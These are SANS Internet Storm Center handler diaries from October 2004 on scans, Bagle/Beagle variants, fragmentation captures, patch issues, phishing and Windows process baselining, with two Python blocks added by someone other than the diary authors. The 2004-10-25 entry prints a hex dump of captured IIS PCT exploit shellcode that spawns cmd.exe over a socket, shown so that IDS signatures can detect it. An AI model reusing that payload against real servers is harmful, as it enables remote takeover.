Published: 2004-10-31

SCANS, Babel (not Bagel/Bagle/Beagle) & Halloween


Port 53 scans are up a bit. Please submit any details of the activity if you're seeing it.


Who is looking for Apples for Halloween?
Scans directed at port 548 (Apple Filing Protocol) are also up a bit, and in the United States during the celebration of Halloween (Trick or Treat!) it's not looked upon favorably if Apples have worms ( ; ^ ). To clarify: that is an attempt at humor; there is no evidence of a worm out to eat Apple systems.

To look for published vulns for this port, select "Associated Vulnerabilities:" on the port report page.

Scans for port 3306 (MySQL) are interesting: a relatively small number of systems are scanning somewhat more aggressively.

To look for published vulns for this port, select "Associated Vulnerabilities:" on the port report page.


Readers submitted information covering a wide range of issues. Responding to readers' malware submissions, and the recent flurry of unique Bagle/Beagle definitions from each AV vendor, underscore the need to support (in every way possible) the developing efforts to establish a common framework that would expedite responses to malware outbreaks.

McAfee AVERT (Anti-Virus Emergency Response Team), which has a great site (link below), has graciously shared the following information which is used here as a recent sample of the "Tower of Babel" problem;

What AVERT calls Bagle.BB:
Kaspersky I-Worm.Bagle.at
Symantec W32.Beagle@mm!cpl
CA Win32/Bagle.AQ.CPL.Worm

What AVERT calls Bagle.BC:
Kaspersky I-Worm.Bagle.au
Symantec W32.Beagle.AU@mm
CA Win32/Bagle.AP.Worm

What AVERT calls Bagle.BD:
Kaspersky I-Worm.Bagle.au
Symantec W32.Beagle.AW@mm
CA Win32/Bagle.AQ.Worm

Having a common framework may also help differentiate why one vendor labels something a trojan and another vendor labels the same file a threat, and it would certainly help those whose resources do not allow for the use of "potentially unwanted", "threat" or "expanded threat" detection solutions.

The McAfee AVERT Website is at;

An effort related to solving one aspect of the Tower of Babel issue and that (imho) deserves widespread user support is the VGrep effort, which is "currently maintained by Dmitry Gryaznov, Senior Manager, Advanced Security Research, McAfee Security" and was "originally created by Ian Whalley". So if you use the site, please support it by giving the operators feedback on your use of it. Thanks gentlemen!

"About VGrep"
'That which we call a rose, By any other name would smell as sweet.'
-- Shakespeare, Romeo and Juliet
Anyone who has had any experience of the anti-virus world will know that a single virus can have several different names - anti-virus vendors are not obliged to conform to any naming conventions, nor do they tend to do so.

VGrep is a system designed to help clear up some of the confusion surrounding the naming of viruses. It works by running scanners across a large collection of virus-infected files, and parsing their output into a simple text database."

In summary, any effort on your part to support developing initiatives in this area, or to encourage your AV vendor, the open source community, Microsoft, or interested elected officials and government agencies to accomplish something in this arena, will pay tangible benefits to you in the future. And don't forget, this is one situation where you can vote twice or more. Vote with your wallet.


We thank you for the information!

One submission was for an email that led to a "Postcard from the Edge". The report (and analysis of the malware) concerned a website that is actively exploiting visitors using vulnerable browsers. The analysis and malware samples came from reader Erik van Straten, who investigated a malicious email he received that directed the user to a web server to read a postcard supposedly sent to them. The server appears to have been active for more than 2 weeks, and it has been reported. Thanks very much for the work Kevin! A portion of the exploit has been identified as exploit.CodeBaseExec and a description is here;


AV vendors whose applications identified another component labelled it W32/Helodor.A@bd (F-Prot), Trojan.Win32.Helodor.gen (Kaspersky), Trj/Helodor.B (Panda) and Backdoor.Guzu (Symantec). At this time the only available write-up that I could access was here;


Phan Mail

We appreciate it!

Patrick Nolan

Support ACK to Pedro Bueno! Thanks!


Published: 2004-10-30

More Fragmentation; What is Normal Part II

More Fragmentation

We have more reports of UDP fragmentation that appear to be very much related. David Tulo has provided some good observations from the first captures he is seeing:

1. The packet length is 64 bytes.

2. The IPID appears random.

3. The Fragment Offset is always 64.

4. TTL is always 52.

5. The IP Header Checksum is valid.

6. The source port is always 4591 (11EF).

7. The destination port is always 53.

8. The length is always 25

9. The DNS ID is always 29175(71F7).

10. The packet has bits set for:

A. DNS Query

B. Recursion Desired

C. 1 Question

11. However... no DNS question is ever asked.

We received another capture from Ian Marks showing the same fragmentation pattern. Here are a couple more observations from the traffic. The More Fragments bit is not set, and the first fragment appears never to have been sent, as neither capture contained it. The data portions of the two were identical except for bytes 7 and 8 of the data, which changed within each capture but were very similar between the two.

We are still very much interested in seeing more captures of similar traffic. Also, if you notice any other activity at the time that may pertain to this, please let us know.
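
As an added illustration (example code written for this page, not from the diary or from the readers' captures), the following Python builds a packet that matches the list of observations above and checks an arbitrary IP packet against the same pattern field by field, including the header checksum in item 5. It assumes that the "offset 64" is the raw 13-bit fragment-offset field (64 * 8 = 512 bytes), that "length 25" is the UDP length field, and it fills the five bytes after the DNS header (unknown from the reports) with zeros; addresses and the IPID are placeholders.

```python
import socket
import struct

# Added example, not part of the diary: a constructed UDP fragment that mirrors
# the observations listed above, plus a checker for the same pattern.
# Assumptions (not stated on the page): "offset 64" is the raw 13-bit
# fragment-offset field, "length 25" is the UDP length field, and the five
# bytes that follow the 12-byte DNS header are unknown and filled with zeros.
# Addresses and the IPID are placeholders.

PATTERN = {
    "proto": 17, "ttl": 52, "frag_offset": 64,
    "sport": 4591, "dport": 53, "udp_len": 25, "dns_id": 0x71F7,
}


def ip_checksum(header: bytes) -> int:
    """RFC 791 one's-complement sum; over a header that already carries a
    correct checksum the result is 0."""
    if len(header) % 2:
        header += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(header) // 2), header))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_sample_fragment(ipid=0x1234, src="198.51.100.7", dst="192.0.2.53"):
    """Constructed IP packet (no Ethernet header) matching the pattern."""
    # DNS header: ID 0x71F7, flags 0x0100 (QR=0 query, RD=1), QDCOUNT=1,
    # then five unknown bytes and no question section.
    dns = struct.pack("!HHHHHH", PATTERN["dns_id"], 0x0100, 1, 0, 0, 0) + b"\x00" * 5
    udp = struct.pack("!HHHH", PATTERN["sport"], PATTERN["dport"], 8 + len(dns), 0) + dns
    # Flags/fragment field: DF=0, MF=0, offset 64.
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(udp), ipid,
                      PATTERN["frag_offset"], PATTERN["ttl"], PATTERN["proto"],
                      0, socket.inet_aton(src), socket.inet_aton(dst))
    hdr = hdr[:10] + struct.pack("!H", ip_checksum(hdr)) + hdr[12:]
    return hdr + udp


def _has_real_question(dns: bytes) -> bool:
    """True only if a terminated QNAME and a non-zero QTYPE follow the header."""
    pos = 12
    while pos < len(dns):
        label_len = dns[pos]
        if label_len == 0:
            return pos + 5 <= len(dns) and dns[pos + 1:pos + 3] != b"\x00\x00"
        pos += 1 + label_len
    return False


def check_fragment(pkt: bytes) -> dict:
    """Evaluate one IP packet against the reported pattern, one flag per
    observation. The payload is decoded as UDP/DNS the way the readers'
    tools did, even though a fragment with a non-zero offset should not
    normally carry a transport header at all."""
    ihl = (pkt[0] & 0x0F) * 4
    payload = pkt[ihl:]
    if pkt[9] != PATTERN["proto"] or len(payload) < 14:
        return {"udp_with_dns_header": False}
    flags_frag = struct.unpack("!H", pkt[6:8])[0]
    sport, dport, udp_len = struct.unpack("!HHH", payload[:6])
    dns = payload[8:]
    dns_id, dns_flags, qdcount = struct.unpack("!HHH", dns[:6])
    return {
        "udp_with_dns_header": True,
        "ttl_52": pkt[8] == PATTERN["ttl"],
        "ip_checksum_valid": ip_checksum(pkt[:ihl]) == 0,
        "mf_clear": not (flags_frag & 0x2000),
        "offset_64": (flags_frag & 0x1FFF) == PATTERN["frag_offset"],
        "ports_4591_to_53": (sport, dport) == (PATTERN["sport"], PATTERN["dport"]),
        "udp_len_25": udp_len == PATTERN["udp_len"],
        "dns_id_71f7": dns_id == PATTERN["dns_id"],
        "query_rd_one_question": (dns_flags & 0x8100) == 0x0100 and qdcount == 1,
        "no_question_present": not _has_real_question(dns),
    }


def matches_pattern(pkt: bytes) -> bool:
    return all(check_fragment(pkt).values())


if __name__ == "__main__":
    sample = build_sample_fragment()
    for name, ok in check_fragment(sample).items():
        print("%-24s %s" % (name, ok))
    print("matches:", matches_pattern(sample))
```

The checker decodes the payload as UDP/DNS only because that is how the readers' tools presented it; a fragment with a non-zero offset does not normally carry a transport header. To run it over real captures, strip the link-layer header first and feed it one IP packet at a time.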

What is Normal Part II

We would like to thank the readers for all the great input! We received many tips on how they identify a baseline for their systems and for finding what should not be there. Here are some of the comments that we received:

John Franolich:

To know what processes are running on a machine, I create a baseline of the ports / processes running when the box first gets built. For example, I fport it out to a text file and keep the file offline. Any program will do fine besides fport, choose your flavor. Then I can compare it later. Of course it is not going to prevent an exe from being wrapped, or not showing up in the tasks list at all, but it is a good start and allows a person to get a gut feeling about a box. Typically on a box that has been taken by scripts I'll see extra spool processes running, etc.

Frank Adams

On my Windows PCs, for monitoring what's normal, I tend to use a program that has a process monitor combined with a port egress monitor called Port Explorer, by Diamond Computer Systems...You get a good sense of what's normal traffic and what isn't very quickly with it on a system, since you see exactly which service or program is sending packets across which ports to what address. The only downside is that it really helps to know what should be running, what address(es) the program or service sends packets to, and what shouldn't be running.

Brandon Enright

What I do now is enter a comment into Process Explorer for all known services. I built one XP machine and one 2000 machine fresh and commented just about every executable from a base install to fully patched. I turned on all the services and commented all those processes. Then I installed as much "spyware" as possible and commented all those processes. Now when I sit down at a machine and see new processes and programs, each one that isn't glaringly obvious gets a quick Google search. New drivers and driver helpers and other programs get commented as good, while new malware gets commented simply as malware or as its viral name. The most common comments are something like "VIRUS (Gaobot)" or "Spyware" or "Anti-Virus (Norton)" or "Good (Dell WiFi Driver)". Since Process Explorer stores the absolute path, not just the executable name, these comments are generally very reliable...It now has over 2200 documented processes.
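
The baseline-then-compare approach John Franolich describes, as added example code (written for this page, not from the diary or any reader): two fport-style snapshots are constructed inline, keyed on protocol and port rather than PID so that a reboot does not produce noise, and the diff reports listeners that appeared, vanished, or changed the executable behind them. The "Pid Process -> Port Proto Path" column layout is an assumption about fport's output, and the process names and paths are placeholders.

```python
import re

# Added example, not part of the diary: compare a saved listening-port
# baseline against a fresh snapshot. Both snapshots are constructed here;
# the column layout imitates fport's output and is an assumption.

BASELINE = r"""
Pid   Process            Port  Proto Path
392   svchost        ->  135   TCP   C:\WINNT\system32\svchost.exe
8     System         ->  139   TCP
8     System         ->  445   TCP
1024  inetinfo       ->  80    TCP   C:\WINNT\system32\inetsrv\inetinfo.exe
1076  MSTask         ->  1025  TCP   C:\WINNT\system32\MSTask.exe
392   svchost        ->  135   UDP   C:\WINNT\system32\svchost.exe
"""

CURRENT = r"""
Pid   Process            Port  Proto Path
400   svchost        ->  135   TCP   C:\WINNT\system32\svchost.exe
8     System         ->  139   TCP
8     System         ->  445   TCP
1144  wingo          ->  81    TCP   C:\WINNT\system32\wingo.exe
1188  spoolsv        ->  1053  TCP   C:\WINNT\system32\spoolsv.exe
1076  MSTask         ->  1025  TCP   C:\WINNT\system32\inetsrv\MSTask.exe
400   svchost        ->  135   UDP   C:\WINNT\system32\svchost.exe
"""

LINE_RE = re.compile(r"^\s*(\d+)\s+(\S+)\s+->\s+(\d+)\s+(TCP|UDP)\s*(.*?)\s*$")


def parse_snapshot(text: str) -> dict:
    """Map (proto, port) -> (process, path). Keyed on the socket rather than
    the PID, because PIDs change on every boot and are not worth diffing.
    Names are lower-cased so a case-only difference is not a finding."""
    listeners = {}
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue                      # banner and header lines
        _pid, proc, port, proto, path = m.groups()
        listeners[(proto, int(port))] = (proc.lower(), path.lower())
    return listeners


def compare_snapshots(baseline: dict, current: dict) -> dict:
    """Listeners that appeared, disappeared, or changed owner since baseline."""
    added = {k: current[k] for k in current.keys() - baseline.keys()}
    missing = {k: baseline[k] for k in baseline.keys() - current.keys()}
    changed = {k: (baseline[k], current[k])
               for k in baseline.keys() & current.keys()
               if baseline[k] != current[k]}
    return {"added": added, "missing": missing, "changed": changed}


def report(result: dict) -> list:
    """One line per finding, sorted by protocol and port."""
    lines = []
    for kind in ("added", "missing", "changed"):
        for (proto, port), val in sorted(result[kind].items()):
            lines.append("%-8s %s/%-5d %s" % (kind.upper(), proto, port, val))
    return lines


if __name__ == "__main__":
    diff = compare_snapshots(parse_snapshot(BASELINE), parse_snapshot(CURRENT))
    for line in report(diff):
        print(line)
```

The "changed" bucket is the one that catches the look-alike case: same port, same process name, but a different path behind it, which is exactly what a quick glance at Task Manager would miss.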
Happy Halloween Everyone!!

Lorna Hutcheson

Handler on Duty



Published: 2004-10-29

New Bagle/Beagle Variants, Fragmentation Attacks, Gmail XSS Hole

New Bagle/Beagle variants on the loose

We received many reports of a new Bagle/Beagle worm variant seen in the wild today. Be sure to update your anti-virus signatures, if you haven't done so already.

It seems that there are actually three different variants out there, but they exhibit similar characteristics: they spread via email and P2P networks, listen on TCP port 81, and attempt to download files from pre-defined web servers.

We received a couple of reports of systems initiating outbound connections on TCP port 81. According to one of these reports (thanks, Mark!), the systems were infected with an older Bagle variant (Beagle.AI, according to McAfee), which is a bit strange. If you've witnessed outbound connections on TCP port 81, please send us your packet traces.

As far as I know, the file that the worm attempts to retrieve from the remote servers is currently not present on any of them. One theory (thanks, Vern!) is that the worm connects to the remote web servers via HTTP in order to register itself in the servers' access or error logs, giving the author a list of infected systems that he or she can then reach via inbound connections to TCP port 81.

The naming of these variants is inconsistent across vendors. I wish anti-virus vendors could agree on the taxonomy, as having different names generates a lot of confusion among anti-virus software users. As far as I can tell, the following names refer to the same variant:

Bagle.AV (Sophos, Symantec)

Bagle.AQ (Computer Associates, Norman)

Bagle.BB (McAfee)

Bagle.BC (Panda)

Bagle.AP, Beagle.AT (F-Secure)

Bagle.AT (Kaspersky, TrendMicro)

The following names seem to refer to a slightly different variant:

Bagle.BC (McAfee)

Bagle.AU (Symantec)

Yet another variant carries the following names:

Beagle.AW (Symantec)

Bagle.AR (Computer Associates)

Bagle.BD (McAfee)

Secunia offers a page with links to several vendors' descriptions of today's Bagle/Beagle variants:


Have you witnessed fragmentation attacks recently?

A bit less than two weeks ago we received a report of a fragmentation attack targeting two unrelated financial services organizations. We'd like to understand that attack better. Here are a few log entries that document it:

Oct 15, 7:59pm > firewall_name: NetScreen device_id=firewall_name [Root]system-critical-00440: Fragmented traffic! From xxx.xxx.xxx.59:4591 to xxx.xxx.xxx.xxx:53, proto UDP (zone Untrust, int ethernet1/2.97). Occurred 1 times.

Oct 15, 7:59pm > firewall_name: NetScreen device_id=firewall_name [Root]system-critical-00440: Fragmented traffic! From xxx.xxx.xxx.12:4591 to xxx.xxx.xxx.xxx:53, proto UDP (zone Untrust, int ethernet1/2.97). Occurred 1 times.

FW-1: OPSEC Oct 15, 7:58pm > ctl inbound E100B3 (null) -> (null) router log: Virtual defragmentation error: Timeout (xxx.xxx.xxx.4 -> xxx.xxx.xxx.xxx proto 17 id 63039 len 0 offset 0) - 5 fragments dropped during the last 60 seconds

FW-1: OPSEC Oct 15, 7:57pm > ctl inbound E100B3 (null) -> (null) router log: Virtual defragmentation error: Timeout (xxx.xxx.xxx.4 -> xxx.xxx.xxx.xxx proto 17 id 2629 len 0 offset 0) - 4 fragments dropped during the last 60 seconds

If you've recently witnessed fragmentation attacks of this nature, please send us the relevant packet captures or log entries.

An XSS hole reported in Gmail

According to a Nana NetLife Magazine report, there is a cross-site scripting (XSS) vulnerability in Gmail, Google's webmail service. The flaw allows an attacker to steal a Gmail user's authentication cookie, providing access to the victim's account without having to know the password. The article states that Google is in the process of addressing the problem:


XSS issues are present in many, many web applications. Unfortunately, many organizations are not set up to prevent XSS flaws during the software development cycle, and are quick to dismiss XSS vulnerabilities as being unreasonably difficult to exploit. In reality, the execution of XSS attacks is often not very challenging, and the exposure can be significant.

The iDefense paper "The Evolution of Cross-Site Scripting Attacks" provides an excellent overview of XSS-related issues. You can access it at the following URL; the site requires (free) registration:


Lenny Zeltser

ISC Handler of the Day



Published: 2004-10-28

URGENT: New version of Beagle hitting


There appears to be a new Beagle on the loose. According to the information on Symantec's Security Response page it opens a backdoor on TCP port 81. It creates an executable with a variant of the name wingo in the file name, adds a wingo.exe entry under the registry key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run, and attempts to disable anti-virus and security software and block access to websites.

Lenny will continue to update in the next diary.
Deb Hale
Handler on Duty


Published: 2004-10-27

Issues with MS04-032 patch / Phishings, Spams and Virus story

Issues with MS04-032 patch

We received a report of problems following installation of Security Update for Microsoft Windows (840987), released by Microsoft on October 12 under Microsoft Security Bulletin MS04-032, on Windows 2000 workstations.

According to the user, after installing the MS04-032 patch, 16-bit applications stop working properly. He also found that some services were dying without any apparent reason.

As a workaround to get his applications working again, he took the following steps:

- For Win2K, log in as local administrator. The local administrator is best for this; not a domain admin who has local admin privileges.

- Uninstall MS04-032 (KB840987) from the system. Allow it to reboot.

- After reboot, log back in as local administrator. This will allow the uninstall to finish.

- We have encountered problems if the second login is not completed by a local administrator.

- Test the 16-bit apps and/or print functions; all should be good.

- Reboot one last time.

We would like to hear if you had similar problems, and if you found workarounds for it.

Another Follow-up on how to identify "normal" processes on Windows

A user also sent a site to be included as a reference for Lorna's Diary ( http://isc.sans.org/diary.php?date=2004-10-24 ). The site is Process Library, at http://www.processlibrary.com/ .

Phishings, Spams and Virus

I am sure that you are all tired of hearing about phishing and its dangers, but I would like to tell one more story. Today I received a phishing spam from a well-known online greeting cards website. This one was really well created, and every link pointed to the real website, and there were two links really close to each other. The first one was "click here to see your card" and the other was "or click here to enter the website and put in your card reference code". The first one was a link to download a password stealer targeting some Brazilian banks, which is detected by only 4 of 10 AV vendors, according to VirusTotal. Which is really not good...

As an FYI, in its packed form it was detected by only 2 of 10; in its zipped form, by 2 of 10; and finally, in its .exe form, by 4 of 10...


Handler on Duty: Pedro Bueno ( pbueno /AT/ isc.sans.org )


Published: 2004-10-25

Port 2000 spike; New IIS PCT exploit?; Following the bouncing MS patches

Port 2000 spike

There is a significant increase in port 2000 activity. Given the number of targets, this appears to be general sweeping. At this point, we don't have a good feeling for what is causing this increase. If you have some packet captures, send them along.


New IIS PCT exploit in the wild?

We received a report that a possibly new IIS PCT exploit (for MS04-011) is being used in the wild. Exploit code for this vulnerability has been known to exist since as early as April 2004, so this is NOT a new vulnerability. This packet capture appears to have 25 extra bytes beginning at offset 0x0E0 below. At this time, we have not been able to determine whether this is completely new, but it should be identified by most IDS signatures given the obvious strings, which were also in the original exploit code: "THCOWNZIIS!" is contiguous at offset 0x013, while "cmd.exe" shows up in the ASCII column as ".exe" followed by "\cmd", two separate PUSH imm32 instructions (opcode 0x68, at offsets 0x126 and 0x12B) that assemble "\cmd.exe" on the stack, so a content match has to key on those pieces rather than on the joined string.

000 80 62 01 02 BD 00 01 00 01 00 16 8F 82 01 00 00 .b..............
010 00 EB 0F 54 48 43 4F 57 4E 5A 49 49 53 21 32 5E ...THCOWNZIIS!2^
020 BE 98 EB 25 96 AA 46 DA 69 4E 02 06 6C 59 6C 59 ...%..F.iN..lYlY
030 F8 1D 9C DE 8C D1 4C 70 D4 03 58 46 57 53 32 5F ......Lp..XFWS2_
040 33 32 2E 44 4C 4C 01 EB 05 E8 F9 FF FF FF 5D 83 32.DLL........].
050 ED 2C 6A 30 59 64 8B 01 8B 40 0C 8B 70 1C AD 8B .,j0Yd...@..p...
060 78 08 8D 5F 3C 8B 1B 01 FB 8B 5B 78 01 FB 8B 4B x.._<.....[x...K
070 1C 01 F9 8B 53 24 01 FA 53 51 52 8B 5B 20 01 FB ....S$..SQR.[ ..
080 31 C9 41 31 C0 99 8B 34 8B 01 FE AC 31 C2 D1 E2 1.A1...4....1...
090 84 C0 75 F7 0F B6 45 09 8D 44 45 08 66 39 10 75 ..u...E..DE.f9.u
0A0 E1 66 31 10 5A 58 5E 56 50 52 2B 4E 10 41 0F B7 .f1.ZX^VPR+N.A..
0B0 0C 4A 8B 04 88 01 F8 0F B6 4D 09 89 44 8D D8 FE .J.......M..D...
0C0 4D 09 75 BE FE 4D 08 74 17 FE 4D 24 8D 5D 1A 53 M.u..M.t..M$.].S
0D0 FF D0 89 C7 6A 02 58 88 45 09 80 45 79 0C EB 82 ....j.X.E..Ey...
0E0 50 8B 45 04 35 93 93 93 93 89 45 04 66 8B 45 02 P.E.5.....E.f.E.
0F0 66 35 93 93 66 89 45 02 58 89 CE 31 DB 53 53 53 f5..f.E.X..1.SSS
100 53 56 46 56 FF D0 89 C7 55 58 66 89 30 6A 10 55 SVFV....UXf.0j.U
110 57 FF 55 E0 8D 45 88 50 FF 55 E8 55 55 FF 55 EC W.U..E.P.U.UU.U.
120 8D 44 05 0C 94 53 68 2E 65 78 65 68 5C 63 6D 64 .D...Sh.exeh\cmd
130 94 31 D2 8D 45 CC 94 57 57 57 53 53 FE CA 01 F2 .1..E..WWWSS....
140 52 94 8D 45 78 50 8D 45 88 50 B1 08 53 53 6A 10 R..ExP.E.P..SSj.
150 FE CE 52 53 53 53 55 FF 55 F0 6A FF FF 55 E4 ..RSSSU.U.j..U.

Following the bouncing MS patches

While Tom Liston is busy working on the next installment of "bouncing malware", here is an interesting story about misbehaving software.

Several weeks ago, a concerned reader submitted an interesting case to the ISC, suspecting a new virus or system compromise. Harpal Parmar reported that a Windows 2000 server running SP4 and fully patched was sending unsolicited packets outbound to specific addresses in the IP range 128.x.x.x -- 136.x.x.x.

The server was sending normal TCP packets to random destination hosts in the above range on TCP port 139 every 10 minutes. Fortunately, Harpal had outbound filtering in place, so the packets never made it to their destination. Upon not receiving a response, the server would retransmit the TCP segments using TCP's normal backoff timing (3, 6, and 12 second intervals).

ISC handlers reviewed a packet capture provided by Harpal and found no evidence of malware or system compromise. So after running several different virus scanners and finding no malware, Harpal looked for other explanations of the root cause. The first step was to rebuild the server offline and monitor for outbound traffic. After applying one specific patch, MS04-011 (KB835732), the activity started again. This patch was confirmed to be the source of the problem after investigation by an engineer at Microsoft, and Microsoft provided another patch that corrected it.

Apparently, the operating system was looking for the SYSVOL$ folder on a domain controller, and a bug was causing the IP address to be read from random memory addresses.

Specific symptoms experienced:

o Windows 2000 SP4

o Dual processor machine (x86)

o IIS installed/enabled

o File and printer sharing disabled

o Outbound connections to TCP port 139 every 10 minutes in IP range: 128.x.x.x -- 136.x.x.x


o Problem caused by application of MS04-011 (KB835732)

o Problem fixed by workaround or patch available at:


Follow-up on Fake RedHat Advisory

The k-otik folks have an analysis of the bad things that might happen
if you follow the instructions in the fake RedHat advisory that was
reported in yesterday's diary:

Follow-up on how to identify "normal" processes on Windows

A couple of additional URLs that may be useful when trying to identify good/bad processes in Windows. Please note that these sites are hosted by companies with commercial products. This is not an endorsement of any commercial products by SANS or the Internet Storm Center (isn't it fun to be politically correct?).




Published: 2004-10-24

What is Normal? Fake RedHat Advisory; JPEG Repair Utility

What is Normal?

We received an email today from Dan Messmer asking what the "good services and processes for WinXP and Win2K" are. It is an excellent question, and it got me thinking about how many times we all look for the "abnormal" things without even being sure of what is normal for a system to begin with. How many times have we all sat down to look at a system's processes and services and wondered what something was? This led to some good suggestions that I would like to share with everyone.

It is important to realize that malware can hide itself and not show up as a running process if you are using Task Manager. If you suspect something is going on, be sure to pay close attention to spelling, since malware often uses service and process names that are spelled almost identically to the valid ones. My tool of choice for looking at processes is Process Explorer from Sysinternals. It shows you everything and gives you much more information about every process. Fellow handler Patrick Nolan had this recommendation: "In addition to Process Explorer, using the latest version of Autoruns from SysInternals allows you to show Services: select View, enable Show Services and then enable Hide Microsoft Signed Entries. For the remaining entries you can now highlight one and right click to Google it."

Another good approach was given by Handler Marc Sachs: "If you routinely check for suspicious computers and have a fairly baselined set of systems here's another approach. Set up a "control" computer that is configured like all of the other ones on your network but don't let anybody use it as a workstation. This computer has the same OS, same patches, same software, etc. Take a look at the running processes, memory allocations, and other metrics on your control computer when examining a suspected computer. The control machine could also be a virtual machine running in VMWare or VirtualPC, it doesn't have to be a separate box."

In addition to the above recommendations, here are some sites that will help you go through your services for what are valid Microsoft services.

For W2K:
For XP:

Here is another site that folks have written in recommending in response to this diary entry and is a good site to have bookmarked:
If you know of other techniques or tools for recognizing what is normal for any operating system, please let us know.

Fake RedHat Advisory

Craig Small reported a fake RedHat advisory that is being circulated, and one of our handlers also received one. The site was taken down on 23 October; still, it is a good reminder that even though most of these are aimed at Windows users, always be suspicious when receiving an email asking you to download something.

JPEG Repair Utility

Another user passed along a good tool for finding and repairing JPEG files that have been modified using the MS04-028 exploit. The link to this tool is

Lorna J. Hutcheson

Handler on Duty



Published: 2004-10-23

Yahoo's Code Verification; Prevalence of Malcode; Hidden File Finding Problem in XP Pro and Home

Yahoo's Code Verification

One reader reported to us that he received a strange email in his Yahoo mailbox. It has a link which redirects to http://help.yahoo.com/help/edit/context/context-02.html.

At the same time, it calls up a pop-up asking you to enter the code shown in a given image.

We have some preliminary analysis on this. If you have also received such emails before, do let us know. We would like to correlate with our findings.
Prevalence of Malcode

A few readers informed us about malcode. One of them detected it after seeing a significant increase in port 445 traffic within their network, which turned out to be a new variant of the Sdbot worm. Malcode has become so prevalent that antivirus vendors are playing a catch-up game. Some of it exploits known Windows vulnerabilities in order to spread; patching helps prevent infection by such worms, and running a properly configured personal firewall helps protect your system as well.

This also demonstrates the importance of constantly monitoring your logs. Early detection of abnormal network traffic will help you reduce the damage should there be a worm attack.
Hidden File Finding Problem in XP Pro and Home (Contributed by Patrick Nolan)

With Simple File Sharing available on XP there are some "circumstances", caused by Microsoft's design, that can result in hidden files remaining hidden unless you start the system in Safe Mode (and I'm not addressing the possibility of trojaned command line tools here). These circumstances have occurred in system compromises reported to the ISC.

FWIW, "Simple File Sharing is always turned on in Windows XP Home Edition-based computers. By default, the Simple File Sharing UI is turned on in Windows XP Professional-based computers that are joined to a workgroup. Windows XP Professional-based computers that are joined to a domain use only the classic file sharing and security interface." (Link A below). Even if you're connected to a Domain, check the setting.

To view these "circumstantially" hidden files in Safe Mode:

For Windows XP Professional using the NTFS file system on a workgroup or standalone computer, the Simple File Sharing setting can be viewed and turned on and off in Windows Explorer under Tools, Folder Options: click the View tab, scroll to the bottom of the Advanced Settings list and clear the "Use simple file sharing (Recommended)" check box. Then restart the system in Safe Mode, log on as Administrator, and use your favorite commands to find the hidden file(s). If the command executable you use has not been trojaned you'll find the hidden files.

For Windows XP Home Edition using the NTFS file system, restart the computer in Safe Mode; "Simple File Sharing is automatically turned off when you run the computer in Safe mode." (Link B below). Log on as Administrator, and use your favorite commands to find the hidden file(s). If the command executable you use has not been trojaned you'll find the hidden files.

A: How to configure file sharing in Windows XP (MS provides a WMP video too)


B: How to Gain Access to the System Volume Information Folder


"Circumstances" - see Windows® XP Under the Hood By Brian Knittel

Publisher : Que
Pub Date : July 30, 2002
ISBN : 0-7897-2733-1
Pages : 736


Published: 2004-10-22

GDI+ exploit mutation lessons and How to (not) report an attack to a large organization

GDI+ exploit mutations and how it re-teaches an old lesson

In September Microsoft announced the JPEG buffer overflow in gdiplus.dll. Again, it was a case where data became code. Although there are scanners to determine if your DLLs are vulnerable (see http://isc.sans.org/gdiscan.php ), the issue remains: a file that was once considered a safe data file is now potentially executable code. This happened before when email became active code, thanks mainly to MS Outlook. How many Outlook vulnerabilities have we had to deal with? It has also happened with other multimedia files (e.g. Winamp buffer overflows).

There have already been a few variant proofs-of-concept released. In response, there are SNORT rules circulating to detect these exploit attempts. There are folks playing around with the code in order to evade those signatures ( http://archives.neohapsis.com/archives/fulldisclosure/2004-10/0475.html ) and I suppose there will be new signatures developed to catch the new versions.

If you read that last paragraph alone (and ignore the URL link,) it could have been written about any vulnerability. JPEG vulnerabilities are not going to end with patches to gdiplus.dll—it’s a new family of vulnerabilities.

It’s not a new discovery, but it is an important lesson. Once data has the potential to be executed as code, it has to be inspected. There’s really no reason to inspect a file differently because of its extension. Even compressed files should be inspected in raw and uncompressed form.
How to (Not) report an attack by a large company

While at the day job, interesting things come across my desk. Recently it was an email from a distraught webmaster complaining that my firm was attacking his simple web forum. Normally, I contact the complainant, do a bit of log searching, and solve the issue. This time I wasn't able to help; we'll see why below.

What to do if your website is under “attack”:

Firstly not everyone knows what an attack is, and not everyone agrees upon the threshold that determines an attack from “popularity.” I’m going to avoid that debate and simply say, it’s an attack worth reporting if you’re impacted enough to take the time to identify and report it. But how do you report it and not pull your hair out (or shoot yourself in the foot) in the process?

Gather logs. You’ll need them to prove to the ISP, webmaster, SANS handler, etc. that the event happened. If you don’t have logs, you will not get help. Instead, you will get requests for logs.

Now that you have your logs, and your case written, you need a sympathetic ear to complain to. Although WHOIS records are going to give you contacts, do not rely on them, especially if it's a large organization that owns them. Large organizations have lots of departments, and the guys running the DNS server (the likely technical contacts of the domain) aren't on the security team. So when you send your report, feel free to include all of the WHOIS contacts, technical and administrative, for both the domain and the IP net-block. Also be sure to use the abuse@ address, which is required by RFC 2142. A visit to the organization's web page may offer other contacts as well. The key is to try all of those contacts at the same time. You don't want to add delay and frustration by sending email to one WHOIS contact and having it ignored.

Most importantly, in wording your report/request for help, the absolutely last thing you want to do is threaten retaliation or legal action. You are understandably upset when you have to sift through gigs of weblogs and research an incident from a firm that you expect to “be secure” or “play nicely,” but threatening the organization is not going to solve your problem any faster. In fact, it’s going to delay things.

This is why I couldn’t help the webmaster who needed it. Once he mentioned lawsuit, I had to cease all communications with him, and direct everything through the legal department. That adds months to the resolution process. Which can take years off of your life and hairline.

To recap, when dealing with any organization, large or small, you’ll want the logs handy for when they request them, you’ll want to shotgun your message across as many of the public contacts as you can find (in moderation—don’t email their employee list, :-P) and be nice to your first contact.

Kevin Liston
kliston at greenman-consulting dot com


Published: 2004-10-21

How To Report A BotNet, Glitch In The Matrix?, Bouncing Malware -IS- In The Works

How To Report A Botnet

Over the past several days, we've been asking readers to report to us information on botnets and botnet controllers. One thing that we've noticed is that there is a wide range of "value" to the information that we're getting. So we thought it would be a good idea to give some guidance about what kind of information we need.

